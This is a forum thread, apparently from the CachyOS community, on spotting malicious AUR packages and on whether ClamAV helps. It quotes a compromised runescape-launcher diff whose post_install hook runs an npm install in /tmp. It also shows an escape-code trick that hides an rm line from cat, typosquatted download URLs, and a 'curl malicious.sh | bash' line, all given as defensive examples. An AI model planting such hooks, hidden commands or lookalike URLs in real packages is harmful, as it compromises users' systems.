AI.
AI is destroying the tech world right now with vulns, malware, zero days and supply chain attacks.
Set that up as a minimum people. I run Crowdstrike on my system so honestly not that worried about this (Crowdstrike detects crap like this no problem, and it did, some buddies and I teated it) but clamav with on access scan should be the bare minimum for any system.
Discord is from the arch repos if you installed this package CachyOS | discord - extra (x86_64) so this one is safe.
You can see if you click on the View source file link
CachyOS | heroic-games-launcher-bin - cachyos (x86_64) is from the AUR, but it wasnât updated recently and I looked at it and looks clean.
No. You do indirectly use the AUR(heroic-games-launcher-bin originated there and you mentioned using it. I do too.), but thatâs fine as a few (extremely unlikely) things would have to happen in order to compromise a package like that in a way that somehow made it to you, the end user.
The maintainer of the package would need to abandon it without anyone noticing, which is already not likely considering its popularity score of 7.72.
Then the orphaned package would have to be picked up by a malicious actor, who would then immediately swap out the contents for whatever payload is going around. This would also be unlikely for something with high visibility like this.
Then the CachyOS maintainers would have to update the cachyos repository with the new package without noticing the changes to the AUR maintainer or package contents.
Then, you would have to update your computer.
This is the sort of attack that hits old, destitute packages because this chain of events can occur without anyone noticing whatâs happening. Not the kind of stuff that CachyOS is going to carry in its own repos. Iâm not going to say itâs absolutely impossible, but Iâd say âque sera seraâ because being worried about something with such a low probability would seem unhealthy to me.
Thanks for linking an affected PKGBUILD diff.
Everyone who is new and using AUR should look at this:
diff --git a/.SRCINFO b/.SRCINFO
index b14f7f7570f8..7b60b48792d2 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -6,6 +6,7 @@ pkgbase = runescape-launcher
install = install.sh
arch = x86_64
license = custom
+ depends = npm
depends = cairo
depends = libgcc
depends = gdk-pixbuf2
@@ -26,9 +27,9 @@ pkgbase = runescape-launcher
validpgpkeys = AAC9264309E4D717441DB9527373B12CE03BEB4B
sha256sums = SKIP
sha256sums = SKIP
- sha256sums_x86_64 = SKIP
- sha256sums_x86_64 = SKIP
source_x86_64 = runescape-launcher_2.2.12_Packages::https://content.runescape.com/downloads/ubuntu/dists/trusty/non-free/binary-amd64/Packages
source_x86_64 = runescape-launcher_2.2.12_amd64.deb::https://content.runescape.com/downloads/ubuntu/pool/non-free/r/runescape-launcher/runescape-launcher_2.2.12_amd64.deb
+ sha256sums_x86_64 = SKIP
+ sha256sums_x86_64 = SKIP
pkgname = runescape-launcher
diff --git a/PKGBUILD b/PKGBUILD
index d087c51793b0..516826a24fd3 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,6 +1,6 @@
# Upstream: RuneScape Linux <noreply@jagex.com>
-# Contributor: Ivan Puntiy <ivan.puntiy-at-gmail>
-# Contributor: Mantas MikulÄnas <grawity@gmail.com>
+# Contributor: Ivan Puntiy <cypriangula@gmail.com>
+# Contributor: Mantas MikulÄnas <cypriangula@gmail.com>
pkgname=runescape-launcher
pkgver=2.2.12
@@ -10,6 +10,7 @@ arch=(x86_64)
license=(custom)
url="https://www.runescape.com/"
depends=(
+ 'npm'
cairo # libcairo2
#libcairo.so=2
libgcc # libgcc1
diff --git a/install.sh b/install.sh
index a8c31ceaaecd..e83d346f701c 100644
--- a/install.sh
+++ b/install.sh
@@ -1,4 +1,6 @@
post_install() {
+ cd /tmp
+ npm install atomic-lockfile commander chalk
# For now, the launcher needs to set CAP_SYS_NICE on the downloaded game
# client (to make the audio issues go away), hence the CAP_SETFCAP.
#
List of red flags:
For contrast, hereâs a normal looking PKGBUILD diff:
diff --git a/.SRCINFO b/.SRCINFO
index e43bc20c5cb1..c1421d1aacd6 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -1,6 +1,6 @@
pkgbase = dotstate-bin
pkgdesc = A modern, secure, and user-friendly dotfile manager
- pkgver = 0.3.3
+ pkgver = 0.3.4
pkgrel = 1
url = https://github.com/serkanyersen/dotstate
arch = x86_64
@@ -8,13 +8,13 @@ pkgbase = dotstate-bin
license = MIT
provides = dotstate
conflicts = dotstate
- source = LICENSE-0.3.3::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.3/LICENSE
- source = README-0.3.3.md::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.3/README.md
+ source = LICENSE-0.3.4::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.4/LICENSE
+ source = README-0.3.4.md::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.4/README.md
sha256sums = 7efa2e24bd29cabcff7c83ee7695a8a53701d94974a4284537be6f4f1b0020a0
sha256sums = c679ca2e886f48ad30ce0404bdfa2db0197f4e7100de7c313a788376cef93901
- source_x86_64 = dotstate-x86_64-0.3.3.tgz::https://github.com/serkanyersen/dotstate/releases/download/v0.3.3/dotstate-x86_64-unknown-linux-musl.tar.gz
- sha256sums_x86_64 = cec28e75f9d22e8af0932cd8e322823cb75d4a9fb4f78fba537a35745d3ee2ff
- source_aarch64 = dotstate-aarch64-0.3.3.tgz::https://github.com/serkanyersen/dotstate/releases/download/v0.3.3/dotstate-aarch64-unknown-linux-musl.tar.gz
- sha256sums_aarch64 = 5525355863a557d24eb33d7f1b9095decc628147a4c200b7ba109f16d4ef3ff0
+ source_x86_64 = dotstate-x86_64-0.3.4.tgz::https://github.com/serkanyersen/dotstate/releases/download/v0.3.4/dotstate-x86_64-unknown-linux-musl.tar.gz
+ sha256sums_x86_64 = fa8d1f4a274b1fb54b99d83a295798ca5c5511fb06a815c82920ce71e7f92828
+ source_aarch64 = dotstate-aarch64-0.3.4.tgz::https://github.com/serkanyersen/dotstate/releases/download/v0.3.4/dotstate-aarch64-unknown-linux-musl.tar.gz
+ sha256sums_aarch64 = d1f49150ce89c190cdd6f5f42a56cb598e3970e911e21c8730f43f8263112582
pkgname = dotstate-bin
diff --git a/PKGBUILD b/PKGBUILD
index 274c7fe63ac2..f5e00c58dab6 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -5,7 +5,7 @@ _pkgname=dotstate
pkgname=${_pkgname}-bin
pkgdesc="A modern, secure, and user-friendly dotfile manager"
-pkgver=0.3.3
+pkgver=0.3.4
pkgrel=1
_pkgvername=v${pkgver}
@@ -26,8 +26,8 @@ source_x86_64=("${_pkgname}-${arch[0]}-${pkgver}.tgz::${url}/releases/download/$
source_aarch64=("${_pkgname}-${arch[1]}-${pkgver}.tgz::${url}/releases/download/${_pkgvername}/${_pkgname}-${_barch[1]}-unknown-linux-musl.tar.gz")
sha256sums=('7efa2e24bd29cabcff7c83ee7695a8a53701d94974a4284537be6f4f1b0020a0'
'c679ca2e886f48ad30ce0404bdfa2db0197f4e7100de7c313a788376cef93901')
-sha256sums_x86_64=('cec28e75f9d22e8af0932cd8e322823cb75d4a9fb4f78fba537a35745d3ee2ff')
-sha256sums_aarch64=('5525355863a557d24eb33d7f1b9095decc628147a4c200b7ba109f16d4ef3ff0')
+sha256sums_x86_64=('fa8d1f4a274b1fb54b99d83a295798ca5c5511fb06a815c82920ce71e7f92828')
+sha256sums_aarch64=('d1f49150ce89c190cdd6f5f42a56cb598e3970e911e21c8730f43f8263112582')
Note that the only things changing are version numbers and checksums.
That way you know the AUR package itself doesnât do anything new that is malicious.
importantly, this is NOT a good way to check for malicious code in a script, since it is trivial to conceal things from cat! There are many ways, here is just one example:
printf 'echo hello\nrm fgsfds\n# \033[2A\necho goodbye' > bad.sh
but many such tricks are still visible in less, so using less instead of cat is better, and less will also wordwrap so it also catches things like:
printf 'aa%sbb\n' "$(head -c 4000 /dev/zero | tr '\0' ' ')" | less
you could hide stuff here too, for example changing the domain or the link structure if thereâs a compromised file somewhere on the server, which can be misleading for human eyes.
Thanks for the info; Iâm following along there. Itâs my main distro.
Edit: However, the scripts are irrelevant to me, as I have not installed a single AUR package.
The domain clearly didnât change here. If it did it woukdnât be a normal-looking change!
Well yes reading the pkgbuild will not protect you if github is compromised.
They should add clamav with the on access scanning as on option on cachy hello.
Just want to remind you about Jia Tan. Trust but verify.
Eh, idk, I think @mihalycsaba has a point.
Imagine the diff would look like this:
diff --git a/.SRCINFO b/.SRCINFO
index e43bc20c5cb1..c1421d1aacd6 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -1,6 +1,6 @@
pkgbase = dotstate-bin
pkgdesc = A modern, secure, and user-friendly dotfile manager
- pkgver = 0.3.3
+ pkgver = 0.3.4
pkgrel = 1
url = https://github.com/serkanyersen/dotstate
arch = x86_64
@@ -8,13 +8,13 @@ pkgbase = dotstate-bin
license = MIT
provides = dotstate
conflicts = dotstate
- source = LICENSE-0.3.3::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.3/LICENSE
- source = README-0.3.3.md::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.3/README.md
+ source = LICENSE-0.3.4::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.4/LICENSE
+ source = README-0.3.4.md::https://raw.githubusercontent.com/serkanyersen/dotstate/v0.3.4/README.md
sha256sums = 7efa2e24bd29cabcff7c83ee7695a8a53701d94974a4284537be6f4f1b0020a0
sha256sums = c679ca2e886f48ad30ce0404bdfa2db0197f4e7100de7c313a788376cef93901
- source_x86_64 = dotstate-x86_64-0.3.3.tgz::https://github.com/serkanyersen/dotstate/releases/download/v0.3.3/dotstate-x86_64-unknown-linux-musl.tar.gz
- sha256sums_x86_64 = cec28e75f9d22e8af0932cd8e322823cb75d4a9fb4f78fba537a35745d3ee2ff
- source_aarch64 = dotstate-aarch64-0.3.3.tgz::https://github.com/serkanyersen/dotstate/releases/download/v0.3.3/dotstate-aarch64-unknown-linux-musl.tar.gz
- sha256sums_aarch64 = 5525355863a557d24eb33d7f1b9095decc628147a4c200b7ba109f16d4ef3ff0
+ source_x86_64 = dotstate-x86_64-0.3.4.tgz::https://gitnub.com/serkanyersen/dotstate/releases/download/v0.3.4/dotstate-x86_64-unknown-linux-musl.tar.gz
+ sha256sums_x86_64 = fa8d1f4a274b1fb54b99d83a295798ca5c5511fb06a815c82920ce71e7f92828
+ source_aarch64 = dotstate-aarch64-0.3.4.tgz::https://github.com/serkamyersen/dotstate/releases/download/v0.3.4/dotstate-aarch64-unknown-linux-musl.tar.gz
+ sha256sums_aarch64 = d1f49150ce89c190cdd6f5f42a56cb598e3970e911e21c8730f43f8263112582
pkgname = dotstate-bin
diff --git a/PKGBUILD b/PKGBUILD
index 274c7fe63ac2..f5e00c58dab6 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -5,7 +5,7 @@ _pkgname=dotstate
pkgname=${_pkgname}-bin
pkgdesc="A modern, secure, and user-friendly dotfile manager"
-pkgver=0.3.3
+pkgver=0.3.4
pkgrel=1
_pkgvername=v${pkgver}
@@ -26,8 +26,8 @@ source_x86_64=("${_pkgname}-${arch[0]}-${pkgver}.tgz::${url}/releases/download/$
source_aarch64=("${_pkgname}-${arch[1]}-${pkgver}.tgz::${url}/releases/download/${_pkgvername}/${_pkgname}-${_barch[1]}-unknown-linux-musl.tar.gz")
sha256sums=('7efa2e24bd29cabcff7c83ee7695a8a53701d94974a4284537be6f4f1b0020a0'
'c679ca2e886f48ad30ce0404bdfa2db0197f4e7100de7c313a788376cef93901')
-sha256sums_x86_64=('cec28e75f9d22e8af0932cd8e322823cb75d4a9fb4f78fba537a35745d3ee2ff')
-sha256sums_aarch64=('5525355863a557d24eb33d7f1b9095decc628147a4c200b7ba109f16d4ef3ff0')
+sha256sums_x86_64=('fa8d1f4a274b1fb54b99d83a295798ca5c5511fb06a815c82920ce71e7f92828')
+sha256sums_aarch64=('d1f49150ce89c190cdd6f5f42a56cb598e3970e911e21c8730f43f8263112582')
Idk if everyone would catch that every time.
IMO the URLs should be parameterized, so only the pgkver changes! Yet non of the AUR pkgs I have (still) installed do that.
this time the domain wasnât changed, but the version tag was, which is bad practice, but this kind of problems are not rare
This could itself become potentially compromised if attacked, so the best advice is what has been given in displaying good vs bad PKGBuilds and user-security common sense. We are the best anti-virus when informed and educated. Trust no single point of failure.
Ok, 12 years without malware protection or being too fussy about having a firewallâŚ
Zero problems⌠and Iâm sure it wouldnât do much good if I were to deliberately install malware.
Iâd be interested to see one good example of how âmalware protectionâ helped you?
How can clamav be compromised?
users are not the best antivirus. This is advice from someone whoâd never worked in the field or has real world experience. Dangerous, not drafted in todayâs reality and should be completely ignored.
Thinking you are smarter than a bad actor is precisely why the tech world keeps getting owned.
most of mine are parametrized, which is good. A simple character by character diff would by highly preferred vs just line by line.
Some avid Windows users here, who conflate and confuse very different concepts into a single angry argument.
The core confusion here: Why are you arguing about ClamAV being âcompromisedâ - thatâs a software vulnerability question which is very different from what ClamAV does.
Youâre also conflating threat models - AUR malware means malicious PKGBUILDs, sourcode backdoors, typo-squatted packages⌠they are NOTHING like traditional âvirusesâ that ClamAV detects - like Windows PE files, macros, email attachmentsâŚ
âUsers are not the best antivirusâ is actually correct advice, but ClamAV on Linux doesnât change the equation because youâre still the one deciding what to install.
curl malicious.sh | bash - which ClamAV signature will catch it?ClamAV is only for scanning files that will go to Windows⌠email servers, SMB shares, uploads etc.
It does NOT protect against:
makepkg hooksIf youâre worried about AUR threats, the ACTUAL mitigations are:
cachyos repos if youâre not smart or confident enough.Iâve never gotten cancer so I wonât get cancer. 11/10 logic.
Insanely false lol enterprise solutions use clamav as their backbone.
A lot of false and old information happening here and itâs hilarious/sad to see.
Donât like clamav? Get a different solution. YoU can get Crowdstrike on Amazon in the states for example and itâs the best one out there.
Letâs see you sot that with ClamAVâŚ
Youâre way off track.
Why not build a metal dectector to protect yourself from burglars?